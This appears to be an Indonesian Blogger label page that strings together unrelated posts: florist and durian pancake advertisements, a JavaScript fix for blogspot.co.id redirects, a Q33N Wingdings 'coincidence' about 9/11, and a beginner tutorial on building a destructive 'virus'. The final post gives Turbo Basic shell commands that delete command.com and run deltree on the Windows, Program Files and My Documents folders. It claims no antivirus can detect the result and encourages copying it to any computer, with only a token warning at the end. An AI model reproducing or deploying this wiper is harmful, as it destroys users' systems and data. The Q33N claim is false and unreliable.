Articles by "Scrift unik"

Showing posts with label Scrift unik. Show all posts



Siapa sih yang tidak suka dengan yang nama nya Bunga ? apa lagi seorang perempuan pasti lah sangat menyukai yang nama nya bunga ini, tak jarangan bunga diidentikkan dengan kecantikan kenapa ? karena dari sekian banyak perempuan pasti lah sangat menyukai bunga. Walaupun kadang ada perempuan yang tidak menyukai mungkin dikarenakan alergi atau ada moment yang tidak menyenangkan dengan bunga.

Nah bunga di dunia ini bukan hanya satu saja loh, berbagai macam bunga-bunga nan cantik yang ada di belahan dunia diantaranya adalah bunga mawar, melati, tulip, dan masih banyak macam bunga lain nya, tak hanya jenisnya saja tetapi berbagai macam bentuk dan warna yang sangat cantik dan menarik untuk dilihat oleh mata kita .

Apa lagi kebetulan sekarang kan bulan februari nih, bulan dimana ada hari orang orang mengungkapkan perasaan dan rasa kasih sayang  nya untuk kerabat, kekasih, maupun orang tua mereka loh. Jadi cocok banget nih buat kalian para lelaki-lelaki yang ingin memberikan hadiah bunga cantik dan special untuk orang-orang terkasih dengan harga yang cukup murah dan kualitas tidak di ragukan lagi ada nih di Toko Bunga Surabaya yang sangat recommended sekali  buat kalian yang ingin sekali membeli bunga yaitu Florist Surabaya. Banyak bunga-bunga cantik dengan kuliatas yang tak di raguakan lagi yang di jual di Florist Surabaya ini.


Di Toko Bunga Surabaya ini juga menjual berbagai macam rangkaian bunga , bukan hanya untuk hadiah yang di bungkus di dalam kotak saja tetapi di Florist Surabaya ini menjual bunga untuk hari special kamu seperti untuk bucket bunga pernikahan, untuk dekorasi  acara atau untuk dekorasi di rumah kalian agar rumah kalian terlihat cantik dan segar serta ada karangan bunga untuk ucapan juga tersedia di Florist Surabaya ini.

So untuk buat kalian jangan ragu untuk memesan dan membeli bunga di Florist Surabaya.



Medan salah satu kota ketiga terbesar di Indonesia kebanyakan dari wisatawan sangat senang berkunjung ke tempat-tempat bersejarah yang berada di kota medan ini salah satu Destinasi wisata utama yang tidak boleh dilewatkan jika kamu berkunjung ke kota Medan adalah Danau Toba yang merupakan danau terbesar di Indonesia . Selain terkenal akan keindahan wisata nya, Medan juga terkenal dengan kuliner nya yang sangat unik dan cocok untuk dijadikan oleh-oleh buat keluarga dirumah. Dan dari sekian banyak oleh-oleh medan ada satu yang begitu terkenal yaitu Pancake Durian.

Pancake durian khas medan merupakan olahan kuliner kue dadar yang terbuat dari tepung terigu, telur ayam, susu dan gula pasir. Bahan-bahan tersebut kemudian dicampur dengan air sehingga menjadikan adonan megental dan kemudian siap di goreng di atas wajan datar yang telah di olesi  sedikit mentega. Saat matang beri toping berupa vla atau cream durian.


Bagi anda yang kebetulan sedang berkunjung ke kota Medan tidak ada salah nya mencoba oleh-oleh khas medan yaitu pancake durian medan. Dan buat kalian yang memang ingin membeli pancake durian khas medan dengan harga murah ada di Maidanii Pancake Durian

Di toko ini anda bisa menemukan olahan durian seperti Pancake Durian, Daging Durian Beku, Durian Goreng, Dimsum, Ice Pack dan makanan halal yang tersertifikasi. Untuk anda yang penasaran silahkan kunjungi websitenya disini atau langsung kunjungi toko nya di Jalan HM Yamin No 121 Medan dan bisa juga hubungi Via Whatsapp di nomor 082274270883.

Nah tunggu apalagi daripada penasaran langsung saja pesan di alamat dan nomor hp diatas. Rasakan nikmatnya Pancake durian medan. Sekian artikel kali ini semoga bisa memberi referensi buat kalian yang ingin mencari oleh-oleh khas medan. Terima kasih sudah membaca

Halo kawan-kawan.
Siang ini saya kaget melihat salah satu blog saya Perjalanan. Tiba-tiba ada yang aneh dengan alexa ranknya. Kemudian saya mencoba untuk masuk ke website alexa dan melihat site saya. Tambah bingung waktu saya mencek yang keluar cuma Blogger.co.id dan alexa nya lumayan fantastis.
Setelah itu saya mencoba kembali pada blog teman saya Mikroshop BJM. Ternyata hasil yang ditunjukkan kembali sama.
Hal itu juga terjadi saat saya membuka homepage dan hasilnya blog saya yang berdomain blogspot.com redirect ke blogspot.co.id. Kenapa bisa begitu ?
Setelah itu saya mencari informasi di beberapa forum dan saya mendapati informasi update mengenai perpindahan domain blogspot sesuai dengan negara provider masing-masing dan saya baru menyadari kalau hal ini sudah berlangsung sejak 3 September yang lalu. Maklum sekarang udah terbiasa dengan domain baru yang bukan blogspot hehehe. Dan ini hasil rangkuman yang saya dapat, dan maaf kalau ada yang salah terutama untuk SEO dan Adsense nya, karna saya newbie dalam hal ini tidak seperti master Ayead Gaptek

Perubahan Domain Blogspot.com Menjadi Blogspot.co.id

Isu Blogspot.com menjadi Blogspot.co.id sudah ada sejak 2012 

Adanya isu perubahan domain ini ternyata sudah ada sejak 2012 yang lalu, dan beberapa negara sudah memberlakukan aturan ini seperti jerman dengan blogspot.de.
Tujuan dari pengalihan domain menurut google untuk mengontrol kebijakan bahwa suatu blog tidak boleh melanggar kebijakan suatu negara, jika tetap banyak blogger yang melanggar maka blogspot untuk negara tersebut akan dihapus dan hanya untuk domain negara tersebut.
Domain blog ini menyesuaikan dengan negara yang mengaksesnya. Seperti Jepang dengan blogspot.jp, Indonesia dengan blogspot.co.id, Amerika dengan blogspot.com, dll

Efek Pengalihan Domain

Perubahan ini pun memicu timbulnya masalah kecil yang akan menjadi besar nantinya apabila di biarkan. Beberapa masalah pun dialami oleh kawan-kawan blogger Indonesia khususnya, seperti berikut :

1. Iklan Google Adsense Tidak muncul 
Untuk pengguna iklan adsense nya google. Iklan google tidak muncul karena google menganggap domain blogger.co.id adalah domain baru. Yang bisa dilakukan adalah menunggu selama 2x24 jam hingga masalah ini diatasi. Dan jangan lupa kita claim alamat blog kita agar iklan kita diakui.

2. Alexa rank membengkak
Kurang lebih sama seperti hal di atas. Blog kita akan di anggap blog baru lahir oleh alexa sehingga akan mempengaruhi rank alexa kita. Dan inilah masalah yan terjadi pada blog saya dan teman saya tadi.

3. Kemungkinan Duplikat Konten
Banyaknya domain berbeda dari setia negara menjadikan terjadinya perbedaan domain yang hanya mengarah kesitus yang sama. Dan memungkinkan terjadinya duplikat konten menurut pakar SEO, entah siapa tapi ini masih diperdebatkan saya kurang mengerti juga hehe. 

Bagaimana Cara Mencegahnya Redirect Otomatis blogspot.com menjadi blogspot.co.id ?

Saya punya tips yang akurat untuk mengatasi hal ini, saya dapat dari beberapa forum dengan resiko tanggung masing-masing.
Berikut langkah-langkahnya:
1. Masuk ke blogger dan buka blog kalian
2. Pilih menu template dan klik edit html
3. Tekan Ctrl+F pada keyboard untuk mencari kode <head> 
4. Masukkan kode html ini persis di bawah kode <head> :

<script type='text/javascript'> var str= window.location.href.toString(); if ((str.indexOf('.com/'))=='-1') { var str1=str.substring(str.lastIndexOf(".blogspot.")); if (str1.indexOf('/')=='-1') { var str2=str1; } else { var str2=str1.substring(0,str1.indexOf('/')+1); } window.location.href =window.location.href.toString().replace(str2,'.blogspot.com/ncr/'); } </script>

Atau kode ini :

<script type="text/javascript">
      var blog = document.location.hostname.split(".");
      if (blog[blog.length - 1] != "com") {
        var ncr = "http://" + blog[0] + ".blogspot.com/ncr";
        window.location.replace(ncr + document.location.pathname);</script>

Perubahan Domain Blogspot.com Menjadi Blogspot.co.id

Setelah memasukkan kode itu di blog alexa rank saya kembali normal (walaupun bengkak karena domain baru -_-"). Silahkan cek dan kunjungi blog saya hahaha.
Itu dulu tulisan dan info dari saya karna saat ini saya sedang dikejar dengan tugas kantor dan ngantuk. Semoga bermanfaat.

 

Teka teki ini hanya kebetulan atau memang sebelumnya udah direncanakan?
Coba kita perhatikan petunjuk ini
1.) Buka notepad atau ketik notepad di Jalankan perintah
2.) Ketik Q33N
3.) Pergi ke Font Format>
4.) Pilih ukuran untuk 72
5.) Sekarang mengubah font untuk Wingdings
6.) Lihat hasilnya


Mengapa Q33N?
Ini adalah nomor pesawat yang digunaan untuk menabrak menara kembar wtc. Boleh percaya boleh tidak, tapi kenyataanya emang demikian hehehe

Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.
Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.
Diatas adalah tampilan Turbo Basic, jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.
shell "Perintah DOS"
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :
shell "c:"
shell "cd\"
shell "del command.com"
Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"
Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?
Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.
Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe

Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.

Author Name

Contact Form

Name

Email *

Message *

Powered by Blogger.